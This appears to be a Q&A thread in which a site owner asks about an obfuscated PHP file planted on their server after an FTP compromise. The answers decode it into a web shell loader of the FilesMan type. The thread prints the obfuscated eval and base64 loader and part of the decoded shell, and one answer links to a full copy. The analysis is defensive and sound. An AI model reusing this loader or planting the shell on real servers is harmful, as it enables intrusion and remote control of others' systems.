# FTP hacked, planted file

Tags: php, virus, apache, ftp

Can anyone help me to understand what this does? Someone has planted a file with this piece of code on my server.It is shortened because it cannot fit the question, but just to have some idea what could it be.

```
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'); 
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
$O0O000O0O=$O0O000O00.$OOO000000{11};
$O0O000O00=$O0O000O00.$OOO000000{3};
$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
$_F=__FILE__;
$_X='Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0cjM1Ow0KJGQ1ZjEzbHRfY2gxcnM1dCA9ICdXNG5kMndzLTZhaTYnOw0KNGYgKHN0cnQybDJ3NXIoczNic3RyKFBIUF9PUywwLG8pKT09Inc0biIpDQogICAgJHN5cz0ndzRuJzsNCiA1bHM1DQogICAgJHN5cz0nM240eCc7DQogICAgDQokaDJtNV9jd2QgPSBAZzV0Y3dkKCk7DQo0Zig0c3M1dCgkX1BPU1RbJ2MnXSkpDQoJQGNoZDRyKCRfUE9TVFsnYyddKTsgICANCiAgICANCiRjd2QgPSBAZzV0Y3dkKCk7DQo0Zigkc3lzID09ICd3NG4nKSANCnsNCiAgICAkaDJtNV9jd2QgPSBzdHJfcjVwbDFjNSgiXFwiLCAiLyIsICRoMm01X2N3ZCk7DQoJJGN3ZCA9IHN0cl9yNXBsMWM1KCJcXCIsICIvIiwgJG......TVFsnMSddID0gJ0Y0bDVzTTFuJzsNCjRmKCAhNW1wdHkoJF9QT1NUWycxJ10pICYmIGYzbmN0NDJuXzV4NHN0cygnbTFkJyAuICRfUE9TVFsnMSddKSApDQoJYzFsbF8zczVyX2YzbmMoJ20xZCcgLiAkX1BPU1RbJzEnXSk7DQoJNXg0dDsNCj8+';
eval($OOO0000O0('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
?>
```

Comment: Besides truncating _X did you leave anything else off? Looks like there are obfuscated "fopen","fread", functions in addition to the "base64_decode" etc... I'm not seeing where those are used...

Answer (score 14):

You can decode the start of $_X:

> ```
> root@bt:~# echo -e 'Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0cjM1Ow0KJGQ1ZjEzbHRfY2gxcnM1dCA9ICdXNG5kMndzLTZhaTYnOw0KNGYgKHN0cnQybDJ3NXIoczNic3RyKFBIUF9PUywwLG8pKT09Inc0biIpDQogICAgJHN5cz0ndzRuJzsNCiA1bHM1DQogICAgJHN5cz0nM240eCc7DQogICAgDQokaDJtNV9jd2QgPSBAZzV0Y3dkKCk7DQo0Zig0c3M1dCgkX1BPU1RbJ2MnXSkpDQoJQGNoZDRyKCRfUE9TVFsnYyddKTsgICANCiAgICANCiRjd2QgPSBAZzV0Y3dkKCk7DQo0Zigkc3lzID09ICd3NG4nKSANCnsNCiAgICAkaDJtNV9jd2QgPSBzdHJfcjVwbDFjNSgiXFwiLCAiLyIsICRoMm01X2N3ZCk7DQoJJGN3ZCA9IHN0cl9yNXBsMWM1KCJcXCIsICIvIiwgJG' | base64 -d -
> ```

```
?><?php

/**
 * @13th2r Ikr1m ALI
 * @c2pyr4ght a06a
 */
@d5f4n5('VERSION','6.0');
@5rr2r_r5p2rt4ng(E_ALL ^ E_NOTICE);
@s5ss42n_st1rt();
@4n4_s5t('5rr2r_l2g',NULL);
@4n4_s5t('l2g_5rr2rs',0);
@4n4_s5t('m1x_5x5c3t42n_t4m5',0);
@s5t_t4m5_l4m4t(0);
@s5t_m1g4c_q32t5s_r3nt4m5(0);

4f(g5t_m1g4c_q32t5s_gpc()) {
    f3nct42n m1dstr4psl1sh5s($1rr1y) {
        r5t3rn 4s_1rr1y($1rr1y) ? 1rr1y_m1p('m1dstr4psl1sh5s', $1rr1y) : str4psl1sh5s($1rr1y);
    }
    $_POST = m1dstr4psl1sh5s($_POST);
}
$d5f13lt_1ct42n = 'F4l5sM1n';
$d5f13lt_3s5_1j1x = tr35;
$d5f13lt_ch1rs5t = 'W4nd2ws-6ai6';
4f (strt2l2w5r(s3bstr(PHP_OS,0,o))=="w4n")
    $sys='w4n';
 5ls5
    $sys='3n4x';

$h2m5_cwd = @g5tcwd();
4f(4ss5t($_POST['c']))
    @chd4r($_POST['c']);   

$cwd = @g5tcwd();
4f($sys == 'w4n') 
{
    $h2m5_cwd = str_r5pl1c5("\\", "/", $h2m5_cwd);
    $cwd = str_r5pl1c5("\\", "/", $base64: invalid input
```

A quick google search reveals that it's a web shell and it has been decoded before:
https://gist.github.com/smiler/4500976

In the `eval` line:

`JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==`

This is base64 decoded to:

```
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
```

Comment: Do you know how the l33t gets translated? E.g., how does "@d5f4n5" get translated to "@define" by the code?

Comment: That happens here: ```$_X=strtr($_X,'123456aouie','aouie123456');```

Answer (score 4):

Once you format the code a little, like how I edited your question, it's easier to see what's going on.

`$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64'` translates to  `$OOO000000=fg6sbehpra4co_tnd`

All of that is used to build the string:

`$OOO0000O0=base64_decode`

The eval section is base64 encoded and resolves to:

```
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
```

As you can see, the `$_X` is also base64 encoded, but I can't decode it because you truncated it.

Translating it all, and removing the obfuscation, it becomes:

```
$_F=__FILE__;
$_X='<truncated>'
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
```

Without knowing what is in `$_X`, we cannot know what the ultimate goal is. The big question is if this PHP file was run after it was uploaded.

Answer (score 2):

I decoded the whole code by changing the `eval` function to `var_dump`. This gave me: `string(133) "$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;"`
or formatted:

```
$_X=base64_decode($_X);
$_X=strtr($_X,'123456aouie','aouie123456');
$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);
eval($_R);
$_R=0;
$_X=0;
```

I replaced the eval function in the file with this code. This code contains `eval` again. I replaced it again with `var_dump` and got the full decoded file:

```
<?php
/**
 * @author Ikram ALI
 * @copyright 2012
 */
@define('VERSION','1.0');
@error_reporting(E_ALL ^ E_NOTICE);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()) {
        function madstripslashes($array) {
                return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
        }
        $_POST = madstripslashes($_POST);
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS,0,3))=="win")
    $sys='win';
 else
    $sys='unix';

$home_cwd = @getcwd();
if(isset($_POST['c']))
        @chdir($_POST['c']);

$cwd = @getcwd();
if($sys == 'win')
{
    $home_cwd = str_replace("\\", "/", $home_cwd);
```

As you can see, the bottom part is missing. I assume that this is because you've only provided half of the script. Since the author of the script is provided I could find the whole code via Google [here](http://hackingforum.ru/Thread-Madsopt-Shell-Total-decoded-Into-PHP-By-Bitshack-Shell-Decoder).

It is a shell. With this is a script, an attacker can view (and sometimes edit) files with, execute commands, view server data, ect... I've even seen some scary functions like `maddos()`, `madsql()`, `madPerms()` in the shell uploaded to your server.

I advise to remove this script and make sure nobody can get access to your FTP server anymore.